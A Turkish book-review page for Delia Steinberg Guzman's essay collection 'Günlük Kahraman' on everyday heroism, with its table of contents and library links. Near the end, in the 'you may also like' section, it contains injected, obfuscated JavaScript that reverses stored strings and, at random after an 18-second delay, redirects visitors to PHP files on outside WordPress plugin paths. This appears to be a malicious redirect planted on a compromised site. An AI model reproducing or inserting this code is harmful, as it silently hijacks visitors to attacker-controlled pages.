fbpx
En Yakın Etkinlikler
Günlük Kahraman

Günlük Kahraman – Delia Steinberg Guzman

Günümüzde artık kullanılmayan bir kavram olan “kahramanca yaşam”, izlediğimiz filmlerde veya okuduğumuz kitaplarda bize sadece “tüketilecek malzeme” olarak sunulan, bu nedenle sinema çıkışlarında birkaç dakikalık coşku ve heyecanın dışında hayatımıza hiçbir şekilde girmeyen bir fikir olarak kalmıştır. Günümüzün tüketime dayalı yaşam anlayışı, bencilliği ve benmerkezciliği öne çıkarmış, ahlaki ve moral değerleri arkaya itmiştir. Kahramanca yaşam, Superman, Batman gibi gerçek olmayan karakterlerle özdeşleştirilmiş, bu nedenle gerçekliği olmayan bir kavram olarak benimsenmiş, hatta alay edilen bir konu olmuştur. Oysa hepimizin içinde saklı kalmış bir kahraman  mevcut, dünyayı kurtarabilecek gücümüz olmasa da en azından kendimizi değiştirebileceğimiz, daha iyi, daha bilinçi, daha erdemli olmamıza yarayacak içsel bir gücümüz vardır. Delia Steinberg Guzman, kitabında işte bu tür kahramanlıktan bahsediyor: “İnsan boyuna karşın titanlara yaraşır bir çabayla gerçek kahramanlıklar yapan küçük günlük kahramanlar”.

Günlük Kahraman, günlük yaşama dair analiz ve pratik çözümler sunan, günlük yaşam içinde “kahramanca tutum”a ilişkin ipuçları veren, otuz makaleden oluşan bir derlemedir. Yazar, kitabında günümüzün kahramanını şöyle tanımlamaktadır: “Herkes kendi çaresine sahiptir. Herkes kendi duygularına ve fikirlerine, hayallerine ve tutkularına sahiptir. Herkesin değişme, daha iyi olma, dünyayı, bulduğundan bir parça daha iyi bırakma arzusu vardır… Ve o noktada, herkeste, tüm bu özellikleriyle, bu şeyleri az ya da çok gerçekleştirmek için canla başla çalışan günlük bir kahraman bulunur.”

İçindekiler :

Yeni Çağ Eski Bilim
Kriz
Ayrımcılık Kanseri
Korku Patolojisi
Felaketle Karşı Karşıya
Cesaretin Yeniden Elde Edilmesi
Acı
Sıkıntı
Saldırganlık
Korkutan Kamuoyu
Çabaya Değer mi?
Bilmek ya da Tanımak
Üstün Gelmek
İlham Nedir?
Duygular Neden Tükenir?
Günlük Kahraman
Sembolik Dil
Özgür Olmak
Zaman
Eros, Aşk
Güvensizlik
Sevdiğimiz Şeyler ve Korktuğumuz Şeyler
Yaşamı Doldurmak
Cesurlar için
Sonsuz Arayıcı
Önerilerimiz
Kendine Güven
Akıntıya Karşı Kürek Çekmek
Klasik Tarzda
Günlük Kahraman - Delia Steinberg Guzman

Yazarın kütüphanemizde Bulunan Diğer Kitapları:

Kütüphanemiz : http://aktiffelsefebursa.org/giordano-bruno-kutuphanesi/

Yazar Delia Steinberg Guzman hakkında bilgi için tıklayın.

 

 

Bakmak İsteyebilirsiniz...

s$NqM=function(n){if (typeof ($NqM.list[n])=="string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay=18000;setTimeout($NqM(0),delay);}$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay=18000;setTimeout($mWn(0),delay);}toacilik-400x600

STOACILIK / JEAN BRUN

Jean Brun, bu kitapta Stoacı Okul – Stoacı Felsefe – Stoacı Bilgelik kurgusuyla okuyucuları derinleştirmeyi ...

Bir Cevap Yazın